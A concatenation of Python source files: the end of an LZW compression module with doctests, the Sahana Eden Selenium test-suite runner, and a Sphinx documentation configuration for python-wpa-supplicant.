>>> decoded = b"".join(decoding)
>>> decoded == bigstr
True
"""
def __init__(self, max_width=DEFAULT_MAX_BITS):
"""
max_width is the maximum width in bits we want to see in the
output stream of codepoints.
"""
self._encoder = Encoder(max_code_size=2**max_width)
self._packer = BitPacker(initial_code_size=self._encoder.code_size())
def encodetobytes(self, bytesource):
"""
Returns an iterator of bytes, adjusting our packed width
between minwidth and maxwidth when it detects an overflow is
about to occur. Dual of L{ByteDecoder.decodefrombytes}.
"""
codepoints = self._encoder.encode(bytesource)
codebytes = self._packer.pack(codepoints)
return codebytes
class ByteDecoder(object):
"""
Decodes, combines bit-unpacking and interpreting a codepoint
stream, suitable for use with bytes generated by
L{ByteEncoder}.
    See L{ByteEncoder} for a usage example.
"""
def __init__(self):
"""
"""
self._decoder = Decoder()
self._unpacker = BitUnpacker(initial_code_size=self._decoder.code_size())
self.remaining = []
def decodefrombytes(self, bytesource):
"""
Given an iterator over BitPacked, Encoded bytes, Returns an
iterator over the uncompressed bytes. Dual of
L{ByteEncoder.encodetobytes}. See L{ByteEncoder} for an
example of use.
"""
codepoints = self._unpacker.unpack(bytesource)
clearbytes = self._decoder.decode(codepoints)
return clearbytes
class BitPacker(object):
"""
Translates a stream of lzw codepoints into a variable width packed
stream of bytes, for use by L{BitUnpacker}. One of a (potential)
set of encoders for a stream of LZW codepoints, intended to behave
    as closely as possible to the TIFF variable-width encoding scheme.
The inbound stream of integer lzw codepoints are packed into
variable width bit fields, starting at the smallest number of bits
it can and then increasing the bit width as it anticipates the LZW
code size growing to overflow.
    This class knows all kinds of intimate things about how its
    upstream codepoint processors work; it knows the control codes
    CLEAR_CODE and END_OF_INFO_CODE, and (more intimately still), it
    makes assumptions about the rate of growth of its consumer's
codebook. This is ok, as long as the underlying encoder/decoders
don't know any intimate details about their BitPackers/Unpackers
"""
def __init__(self, initial_code_size):
"""
Takes an initial code book size (that is, the count of known
codes at the beginning of encoding, or after a clear)
"""
self._initial_code_size = initial_code_size
def pack(self, codepoints):
"""
Given an iterator of integer codepoints, returns an iterator
over bytes containing the codepoints packed into varying
        lengths, with bit width growing to accommodate an input codebook
that it assumes will grow by one entry per codepoint seen.
Widths will be reset to the given initial_code_size when the
LZW CLEAR_CODE or END_OF_INFO_CODE code appears in the input,
and bytes following END_OF_INFO_CODE will be aligned to the
next byte boundary.
>>> import lzw
>>> pkr = lzw.BitPacker(258)
>>> [ b for b in pkr.pack([ 1, 257]) ] == [ chr(0), chr(0xC0), chr(0x40) ]
True
"""
tailbits = []
codesize = self._initial_code_size
minwidth = 8
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
nextwidth = minwidth
for pt in codepoints:
newbits = inttobits(pt, nextwidth)
tailbits = tailbits + newbits
# PAY ATTENTION. This calculation should be driven by the
# size of the upstream codebook, right now we're just trusting
# that everybody intends to follow the TIFF spec.
codesize = codesize + 1
if pt == END_OF_INFO_CODE:
while len(tailbits) % 8:
tailbits.append(0)
if pt in [ CLEAR_CODE, END_OF_INFO_CODE ]:
nextwidth = minwidth
codesize = self._initial_code_size
elif codesize >= (2 ** nextwidth):
nextwidth = nextwidth + 1
while len(tailbits) > 8:
nextbits = tailbits[:8]
nextbytes = bitstobytes(nextbits)
for bt in nextbytes:
yield struct.pack("B", bt)
tailbits = tailbits[8:]
if tailbits:
tail = bitstobytes(tailbits)
for bt in tail:
yield struct.pack("B", bt)
class BitUnpacker(object):
"""
An adaptive-width bit unpacker, intended to decode streams written
by L{BitPacker} into integer codepoints. Like L{BitPacker}, knows
about code size changes and control codes.
"""
def __init__(self, initial_code_size):
"""
initial_code_size is the starting size of the codebook
associated with the to-be-unpacked stream.
"""
self._initial_code_size = initial_code_size
def unpack(self, bytesource):
"""
Given an iterator of bytes, returns an iterator of integer
code points. Auto-magically adjusts point width when it sees
an almost-overflow in the input stream, or an LZW CLEAR_CODE
or END_OF_INFO_CODE
Trailing bits at the end of the given iterator, after the last
codepoint, will be dropped on the floor.
        At the end of the iteration, or when an END_OF_INFO_CODE is seen,
        the unpacker will ignore the bits after the code until it
        reaches the next aligned byte. END_OF_INFO_CODE will *not*
        stop the generator, just reset the alignment and the width.
>>> import lzw
>>> unpk = lzw.BitUnpacker(initial_code_size=258)
>>> [ i for i in unpk.unpack([ chr(0), chr(0xC0), chr(0x40) ]) ]
[1, 257]
"""
bits = []
offset = 0
ignore = 0
codesize = self._initial_code_size
minwidth = 8
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
pointwidth = minwidth
for nextbit in bytestobits(bytesource):
offset = (offset + 1) % 8
if ignore > 0:
ignore = ignore - 1
continue
bits.append(nextbit)
if len(bits) == pointwidth:
codepoint = intfrombits(bits)
bits = []
yield codepoint
codesize = codesize + 1
if codepoint in [ CLEAR_CODE, END_OF_INFO_CODE ]:
codesize = self._initial_code_size
pointwidth = minwidth
else:
# is this too late?
while codesize >= (2 ** pointwidth):
pointwidth = pointwidth + 1
if codepoint == END_OF_INFO_CODE:
ignore = (8 - offset) % 8
class Decoder(object):
"""
Uncompresses a stream of lzw code points, as created by
L{Encoder}. Given a list of integer code points, with all
unpacking foolishness complete, turns that list of codepoints into
a list of uncompressed bytes. See L{BitUnpacker} for what this
doesn't do.
"""
def __init__(self):
"""
Creates a new Decoder. Decoders should not be reused for
different streams.
"""
self._clear_codes()
self.remainder = []
def code_size(self):
"""
Returns the current size of the Decoder's code book, that is,
        its mapping of codepoints to byte strings. The return value of
        this method will change as the decoder encounters more encoded
input, or control codes.
"""
return len(self._codepoints)
def decode(self, codepoints):
"""
Given an iterable of integer codepoints, yields the
corresponding bytes, one at a time, as byte strings of length
E{1}. Retains the state of the codebook from call to call, so
if you have another stream, you'll likely need another
decoder!
Decoders will NOT handle END_OF_INFO_CODE (rather, they will
handle the code by throwing an exception); END_OF_INFO should
be handled by the upstream codepoint generator (see
L{BitUnpacker}, for example)
>>> import lzw
>>> dec = lzw.Decoder()
>>> ''.join(dec.decode([103, 97, 98, 98, 97, 32, 258, 260, 262, 121, 111, 263, 259, 261, 256]))
'gabba gabba yo gabba'
"""
codepoints = [ cp for cp in codepoints ]
for cp in codepoints:
decoded = self._decode_codepoint(cp)
for character in decoded:
yield character
def _decode_codepoint(self, codepoint):
"""
Will raise a ValueError if given an END_OF_INFORMATION
code. EOI codes should be handled by callers if they're
present in our source stream.
>>> import lzw
>>> dec = lzw.Decoder()
>>> beforesize = dec.code_size()
>>> dec._decode_codepoint(0x80)
'\\x80'
>>> dec._decode_codepoint(0x81)
'\\x81'
>>> beforesize + 1 == dec.code_size()
True
>>> dec._decode_codepoint(256)
''
>>> beforesize == dec.code_size()
True
"""
ret = ""
if codepoint == CLEAR_CODE:
self._clear_codes()
elif codepoint == END_OF_INFO_CODE:
raise ValueError("End of information code not supported directly by this Decoder")
else:
if codepoint in self._codepoints:
ret = self._codepoints[ codepoint ]
if None != self._prefix:
self._codepoints[ len(self._codepoints) ] = self._prefix + ret[0]
else:
ret = self._prefix + self._prefix[0]
self._codepoints[ len(self._codepoints) ] = ret
self._prefix = ret
return ret
def _clear_codes(self):
self._codepoints = dict([(pt, struct.pack("B", pt)) for pt in range(256)])
self._codepoints[CLEAR_CODE] = CLEAR_CODE
self._codepoints[END_OF_INFO_CODE] = END_OF_INFO_CODE
self._prefix = None
class Encoder(object):
"""
Given an iterator of bytes, returns an iterator of integer
codepoints, suitable for use by L{Decoder}. The core of the
"compression" side of lzw compression/decompression.
"""
def __init__(self, max_code_size=(2**DEFAULT_MAX_BITS)):
"""
When the encoding codebook grows larger than max_code_size,
the Encoder will clear its codebook and emit a CLEAR_CODE
"""
self.closed = False
self._max_code_size = max_code_size
self._buffer = ''
self._clear_codes()
if max_code_size < self.code_size():
raise ValueError("Max code size too small, (must be at least {0})".format(self.code_size()))
def code_size(self):
"""
Returns a count of the known codes, including codes that are
implicit in the data but have not yet been produced by the
iterator.
"""
return len(self._prefixes)
def flush(self):
"""
Yields any buffered codepoints, followed by a CLEAR_CODE, and
clears the codebook as a side effect.
"""
flushed = []
if self._buffer:
yield self._prefixes[ self._buffer ]
self._buffer = ''
yield CLEAR_CODE
self._clear_codes()
def encode(self, bytesource):
"""
Given an iterator over bytes, yields the
corresponding stream of codepoints.
Will clear the codes at the end of the stream.
>>> import lzw
>>> enc = lzw.Encoder()
>>> [ cp for cp in enc.encode("gabba gabba yo gabba") ]
[103, 97, 98, 98, 97, 32, 258, 260, 262, 121, 111, 263, 259, 261, 256]
"""
for b in bytesource:
for point in self._encode_byte(b):
yield point
if self.code_size() >= self._max_code_size:
for pt in self.flush():
yield pt
for point in self.flush():
yield point
def _encode_byte(self, byte):
        # Yields one or zero codepoints, AND changes the internal state of
# the codebook and prefix buffer.
#
# Unless you're in self.encode(), you almost certainly don't
# want to call this.
new_prefix = self._buffer
if new_prefix + byte in self._prefixes:
new_prefix = new_prefix + byte
elif new_prefix:
encoded = self._prefixes[ new_prefix ]
self._add_code(new_prefix + byte)
new_prefix = byte
yield encoded
self._buffer = new_prefix
def _clear_codes(self):
# Teensy hack, CLEAR_CODE and END_OF_INFO_CODE aren't
# equal to any possible string.
self._prefixes = dict([(struct.pack("B", codept), codept) for codept in range(256)])
self._prefixes[ CLEAR_CODE ] = CLEAR_CODE
self._prefixes[ END_OF_INFO_CODE ] = END_OF_INFO_CODE
def _add_code(self, newstring):
self._prefixes[ newstring ] = len(self._prefixes)
class PagingEncoder(object):
"""
UNTESTED. Handles encoding of multiple chunks or streams of encodable data,
separated with control codes. Dual of PagingDecoder.
"""
def __init__(self, initial_code_size, max_code_size):
self._initial_code_size = initial_code_size
self._max_code_size = max_code_size
def encodepages(self, pages):
"""
Given an iterator of iterators of bytes, produces a single
        iterator containing a delimited sequence of independently
compressed LZW sequences, all beginning on a byte-aligned
spot, all beginning with a CLEAR code and all terminated with
an END_OF_INFORMATION code (and zero to seven trailing junk
bits.)
The dual of PagingDecoder.decodepages
>>> import lzw
>>> enc = lzw.PagingEncoder(257, 2**12)
>>> coded = enc.encodepages([ "say hammer yo hammer mc hammer go hammer",
... "and the rest can go and play",
... "can't touch this" ])
...
>>> b"".join(coded)
'\\x80\\x1c\\xcc\\'\\x91\\x01\\xa0\\xc2m6\\x99NB\\x03\\xc9\\xbe\\x0b\\x07\\x84\\xc2\\xcd\\xa68|"\\x14 3\\xc3\\xa0\\xd1c\\x94\\x02\\x02\\x80\\x18M\\xc6A\\x01\\xd0\\xd0e\\x10\\x1c\\x8c\\xa73\\xa0\\x80\\xc7\\x02\\x10\\x19\\xcd\\xe2\\x08\\x14\\x10\\xe0l0\\x9e`\\x10\\x10\\x80\\x18\\xcc&\\xe19\\xd0@t7\\x9dLf\\x889\\xa0\\xd2s\\x80@@'
"""
for page in pages:
encoder = Encoder(max_code_size=self._max_code_size)
codepoints = encoder.encode(page)
codes_and_eoi = itertools.chain([ CLEAR_CODE ], codepoints, [ END_OF_INFO_CODE ])
packer = BitPacker(initial_code_size=encoder.code_size())
packed = packer.pack(codes_and_eoi)
for byte in packed:
yield byte
class PagingDecoder(object):
"""
    UNTESTED. Dual of PagingEncoder, knows how to handle independently encoded,
END_OF_INFO_CODE delimited chunks of an inbound byte stream
"""
def __init__(self, initial_code_size):
self._initial_code_size = initial_code_size
self._remains = []
def next_page(self, codepoints):
"""
Iterator over the next page of codepoints.
"""
self._remains = []
try:
while 1:
cp = codepoints.next()
if cp != END_OF_INFO_CODE:
yield cp
else:
self._remains = codepoints
break
except StopIteration:
pass
def decodepages(self, bytesource):
"""
Takes an iterator of bytes, returns an iterator of iterators
of uncompressed data. Expects input to conform to the output
conventions of PagingEncoder(), in particular that "pages" are
separated with an END_OF_INFO_CODE and padding up to the next
byte boundary.
BUG: Dangling trailing page on decompression.
>>> import lzw
>>> pgdec = lzw.PagingDecoder(initial_code_size=257)
>>> pgdecoded = pgdec.decodepages(
... ''.join([ '\\x80\\x1c\\xcc\\'\\x91\\x01\\xa0\\xc2m6',
... '\\x99NB\\x03\\xc9\\xbe\\x0b\\x07\\x84\\xc2',
... '\\xcd\\xa68|"\\x14 3\\xc3\\xa0\\xd1c\\x94',
... '\\x02\\x02\\x80\\x18M\\xc6A\\x01\\xd0\\xd0e',
... '\\x10\\x1c\\x8c\\xa73\\xa0\\x80\\xc7\\x02\\x10',
... '\\x19\\xcd\\xe2\\x08\\x14\\x10\\xe0l0\\x9e`\\x10',
... '\\x10\\x80\\x18\\xcc&\\xe19\\xd0@t7\\x9dLf\\x889',
... '\\xa0\\xd2s\\x80@@' ])
... )
>>> [ b"".join(pg) for pg in pgdecoded ]
['say hammer yo hammer mc hammer go hammer', 'and the rest can go and play', "can't touch this", '']
"""
# TODO: WE NEED A CODE SIZE POLICY OBJECT THAT ISN'T THIS.
# honestly, we should have a "codebook" object we need to pass
# to bit packing/unpacking tools, etc, such that we don't have
# to roll all of these code size assumptions everyplace.
unpacker = BitUnpacker(initial_code_size=self._initial_code_size)
codepoints = unpacker.unpack(bytesource)
self._remains = codepoints
while self._remains:
nextpoints = self.next_page(self._remains)
nextpoints = [ nx for nx in nextpoints ]
decoder = Decoder()
decoded = decoder.decode(nextpoints)
decoded = [ dec for dec in decoded ]
yield decoded
#########################################
# Conveniences.
# PYTHON V2
def unpackbyte(b):
"""
Given a one-byte long byte string, returns an integer. Equivalent
to struct.unpack("B", b)
"""
(ret,) = struct.unpack("B", b)
return ret
# PYTHON V3
# def unpackbyte(b): return b
def filebytes(fileobj, buffersize=1024):
"""
Convenience for iterating over the bytes in a file. Given a
file-like object (with a read(int) method), returns an iterator
over the bytes of that file.
"""
buff = fileobj.read(buffersize)
while buff:
for byte in buff: yield byte
buff = fileobj.read(buffersize)
def readbytes(filename, buffersize=1024):
"""
Opens a file named by filename and iterates over the L{filebytes}
found therein. Will close the file when the bytes run out.
"""
for byte in filebytes(open(filename, "rb"), buffersize):
yield byte
def writebytes(filename, bytesource):
"""
Convenience for emitting the bytes we generate to a file. Given a
filename, opens and truncates the file, dumps the bytes
from bytesource into it, and closes it
"""
    outfile = open(filename, "wb")
    for bt in bytesource:
        outfile.write(bt)
    outfile.close()
def inttobits(anint, width=None):
"""
Produces an array of booleans representing the given argument as
an unsigned integer, MSB first. If width is given, will pad the
MSBs to the given width (but will NOT truncate overflowing
results)
>>> import lzw
>>> lzw.inttobits(304, width=16)
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]
"""
remains = anint
retreverse = []
while remains:
retreverse.append(remains & 1)
remains = remains >> 1
retreverse.reverse()
ret = retreverse
if None != width:
ret_head = [ 0 ] * (width - len(ret))
ret = ret_head + ret
return ret
def intfrombits(bits):
"""
Given a list of boolean values, interprets them as a binary
encoded, MSB-first unsigned integer (with True == 1 and False
== 0) and returns the result.
>>> import lzw
>>> lzw.intfrombits([ 1, 0, 0, 1, 1, 0, 0, 0, 0 ])
304
"""
ret = 0
lsb_first = [ b for b in bits ]
lsb_first.reverse()
for bit_index in range(len(lsb_first)):
if lsb_first[ bit_index ]:
ret = ret | (1 << bit_index)
return ret
def bytestobits(bytesource):
"""
Breaks a given iterable of bytes into an iterable of boolean
values representing those bytes as unsigned integers.
>>> import lzw
>>> [ x for x in lzw.bytestobits(b"\\x01\\x30") ]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]
"""
for b in bytesource:
value = unpackbyte(b)
for bitplusone in range(8, 0, -1):
bitindex = bitplusone - 1
nextbit = 1 & (value >> bitindex)
yield nextbit
def bitstobytes(bits):
"""
Interprets an indexable list of booleans as bits, MSB first, to be
    packed into a list of integers from 0 to 255, MSB first, with LSBs
zero-padded. Note this padding behavior means that round-trips of
bytestobits(bitstobytes(x, width=W)) may not yield what you expect
them to if W % 8 != 0
Does *NOT* pack the returned values into a bytearray or the like.
>>> import lzw
>>> bitstobytes([0, 0, 0, 0, 0, 0, 0, 0, "Yes, I'm True"]) == [ 0x00, 0x80 ]
True
>>> bitstobytes([0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0]) == [ 0x01, 0x30 ]
True
"""
ret = []
nextbyte = 0
nextbit = 7
for bit in bits:
if bit:
nextbyte = nextbyte | (1 << nextbit)
if nextbit:
nextbit = nextbit - 1
else:
ret.append(nextbyte)
nextbit = 7
nextbyte = 0
if nextbit < 7: ret.append(nextbyte)
return ret
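

# --- Illustrative usage sketch (editorial addition, not part of the original
# module). It round-trips an in-memory byte string through compress() and
# decompress() defined above; nothing outside this file is assumed.
if __name__ == "__main__":
    sample = b"how much wood would a woodchuck chuck if a woodchuck could chuck wood"
    packed = b"".join(compress(sample))
    restored = b"".join(decompress(packed))
    # The round trip must reproduce the original bytes exactly.
    assert restored == sample
    print "lzw round trip ok: %d bytes in, %d bytes packed" % (len(sample), len(packed))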
| mit |
smeissner/eden | modules/tests/suite.py | 4 | 10356 | # This script is designed to be run as a Web2Py application:
# python web2py.py -S eden -M -R applications/eden/modules/tests/suite.py
# or
# python web2py.py -S eden -M -R applications/eden/modules/tests/suite.py -A testscript
import os
import sys
import re
import time
import unittest
import argparse
def loadAllTests():
# Create Organisation
loadTests = unittest.TestLoader().loadTestsFromTestCase
suite = loadTests(CreateOrganisation)
# Shortcut
addTests = suite.addTests
# Create Office
addTests(loadTests(CreateOffice))
# Setup Staff
addTests(loadTests(CreateStaff))
addTests(loadTests(CreateStaffJobRole))
addTests(loadTests(CreateStaffCertificate))
# Setup Volunteer
addTests(loadTests(CreateVolunteer))
addTests(loadTests(CreateVolunteerJobRole))
addTests(loadTests(CreateVolunteerProgramme))
addTests(loadTests(CreateVolunteerSkill))
addTests(loadTests(CreateVolunteerCertificate))
# Create Staff & Volunteer Training
addTests(loadTests(CreateStaffTraining))
addTests(loadTests(CreateVolunteerTraining))
# Inventory tests
addTests(loadTests(SendItem))
addTests(loadTests(ReceiveItem))
addTests(loadTests(SendReceiveItem))
# Project Tests
addTests(loadTests(CreateProject))
# Asset Tests
addTests(loadTests(CreateAsset))
# Assign Staff to Organisation
addTests(loadTests(AddStaffToOrganisation))
# Assign Staff to Office
addTests(loadTests(AddStaffToOffice))
# Assign Staff to Warehouse
addTests(loadTests(AddStaffToWarehouse))
# Delete a prepop organisation
#addTests(loadTests(DeleteOrganisation))
# Create a Warehouse
addTests(loadTests(CreateWarehouse))
# Create an Item
addTests(loadTests(CreateItem))
# Create a Catalog
addTests(loadTests(CreateCatalog))
# Create a Category
addTests(loadTests(CreateCategory))
# Create Members
addTests(loadTests(CreateMember))
# Search Staff (Simple & Advance)
#addTests(loadTests(SearchStaff))
return suite
# Set up the command line arguments
desc = "Script to run the Sahana Eden test suite."
parser = argparse.ArgumentParser(description = desc)
parser.add_argument("-C", "--class",
help = "Name of class to run"
)
method_desc = """Name of method to run, this is used in conjunction with the
class argument or with the name of the class followed by the name of the method
separated with a period, class.method.
"""
parser.add_argument("-M",
"--method",
"--test",
help = method_desc
)
parser.add_argument("-A",
"--auth",
help = """web2py default argument feed""",
)
parser.add_argument("-V", "--verbose",
type = int,
default = 1,
help = "The level of verbose reporting")
parser.add_argument("--nohtml",
action='store_const',
const=True,
help = "Disable HTML reporting."
)
parser.add_argument("--html-path",
help = "Path where the HTML report will be saved.",
default = ""
)
parser.add_argument("--html-name-date",
action='store_const',
const=True,
help = "Include just the date in the name of the HTML report."
)
suite_desc = """This will execute a standard testing schedule. The valid values
are smoke, roles, quick, complete and full. If a method or class option is selected
then the suite will be ignored.
The suite options can be described as follows:
smoke: This will run the broken link test
quick: This will run all the tests marked as essential
complete: This will run all tests except those marked as long
full: This will run all tests
"""
parser.add_argument("--suite",
help = suite_desc,
choices = ["smoke", "roles", "quick", "complete", "full"],
default = "quick")
parser.add_argument("--link-depth",
type = int,
default = 16,
help = "The recursive depth when looking for links")
up_desc = """The user name and password, separated by a /. Multiple user name
and passwords can be added by separating them with a comma. If multiple user
name and passwords are provided then the same test will be run sequentially
using the given user in each case.
"""
parser.add_argument("--user-password",
default = "[email protected]/testing",
help = up_desc
)
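# Illustrative invocation (editorial sketch; the e-mail addresses and password
# below are placeholders, not real accounts):
#   python web2py.py -S eden -M -R applications/eden/modules/tests/suite.py \
#       -A --suite quick --user-password "admin@example.com/secret,vol@example.com/secret"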
parser.add_argument("--keep-browser-open",
help = "Keep the browser open once the tests have finished running",
action='store_const',
const = True)
desc = """Run the smoke tests even if debug is set to true.
With debug on it can add up to a second per link, and given that a full run
of the smoke tests will include thousands of links, the difference of having
this setting on can be measured in hours.
"""
parser.add_argument("--force-debug",
action='store_const',
const=True,
help = desc
)
argsObj = parser.parse_args()
args = argsObj.__dict__
# Selenium WebDriver
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from gluon import current
from gluon.storage import Storage
current.data = Storage()
# S3 Tests
from tests.web2unittest import *
from tests import *
# Read Settings
settings = current.deployment_settings
public_url = settings.get_base_public_url()
base_url = "%s/%s" % (public_url, current.request.application)
system_name = settings.get_system_name()
# Store these to be available to modules
config = current.test_config = Storage()
config.system_name = system_name
config.timeout = 5 # seconds
config.url = base_url
base_dir = os.path.join(os.getcwd(), "applications", current.request.application)
test_dir = os.path.join(base_dir, "modules", "tests")
config.base_dir = base_dir
if not args["suite"] == "smoke" and settings.get_ui_navigate_away_confirm():
print "The tests will fail unless you have settings.ui.navigate_away_confirm = False in models/000_config.py"
exit()
if args["suite"] == "smoke" or args["suite"] == "complete":
if settings.get_base_debug() and not args["force_debug"]:
print "settings.base.debug is set to True in 000_config.py, either set it to False or use the --force-debug switch"
exit()
config.verbose = args["verbose"]
browser_open = False
# @todo test with invalid class and methods passed as CLA
if args["method"]:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
    if args["class"]:
        name = "%s.%s" % (args["class"], args["method"])
    else:
        # -M may also be given on its own in the form Class.method
        name = args["method"]
    class_name, method_name = name.rsplit(".", 1)
    suite = unittest.TestLoader().loadTestsFromName(method_name,
                                                    globals()[class_name]
                                                    )
elif args["class"]:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[args["class"]])
elif args["suite"] == "smoke":
try:
from tests.smoke import *
broken_links = BrokenLinkTest()
broken_links.setDepth(args["link_depth"])
broken_links.setUser(args["user_password"])
suite = unittest.TestSuite()
suite.addTest(broken_links)
except NameError as msg:
from s3 import s3_debug
s3_debug("%s, unable to run the smoke tests." % msg)
pass
elif args["suite"] == "roles":
from tests.roles import *
#suite = unittest.TestSuite()
suite = test_roles()
#test_role = TestRole()
#test_role.set(org = "Org-A",
# user = "[email protected]",
# row_num = 0,
# method = "create",
# table = "org_organisation",
# c = None,
# f = None,
# record_id = 42,
# uuid = "uuid",
# permission = True)
#suite.addTest(test_role)
#suite = unittest.TestLoader().loadTestsFromTestCase(globals()[args["auth"]])
elif args["suite"] == "complete":
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
suite = loadAllTests()
try:
from tests.smoke import *
broken_links = BrokenLinkTest()
broken_links.setDepth(args["link_depth"])
broken_links.setUser(args["user_password"])
suite.addTest(broken_links)
except NameError as msg:
from s3 import s3_debug
s3_debug("%s, unable to run the smoke tests." % msg)
pass
else:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
# Run all Tests
suite = loadAllTests()
config.html = False
if args["nohtml"]:
unittest.TextTestRunner(verbosity=config.verbose).run(suite)
else:
try:
path = args["html_path"]
if args["html_name_date"]:
filename = "Sahana-Eden-%s.html" % current.request.now.date()
else:
filename = "Sahana-Eden-%s.html" % current.request.now
# Windows compatibility
filename = filename.replace(":", "-")
fullname = os.path.join(path,filename)
fp = file(fullname, "wb")
config.html = True
from tests.runner import EdenHTMLTestRunner
runner = EdenHTMLTestRunner(
stream = fp,
title = "Sahana Eden",
verbosity = config.verbose,
)
runner.run(suite)
except ImportError:
config.html = False
unittest.TextTestRunner(verbosity=config.verbose).run(suite)
# Cleanup
if browser_open and not args["keep_browser_open"]:
browser.close()
| mit |
wangxhere/python-wpa-supplicant | docs/source/conf.py | 2 | 9398 | # -*- coding: utf-8 -*-
#
# python-wpa-supplicant documentation build configuration file, created by
# sphinx-quickstart on Wed Jun 3 14:30:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-wpa-supplicant'
copyright = u'2015, Stephen Stack'
author = u'Stephen Stack'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-wpa-supplicantdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'python-wpa-supplicant.tex', u'python-wpa-supplicant Documentation',
u'Stephen Stack', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
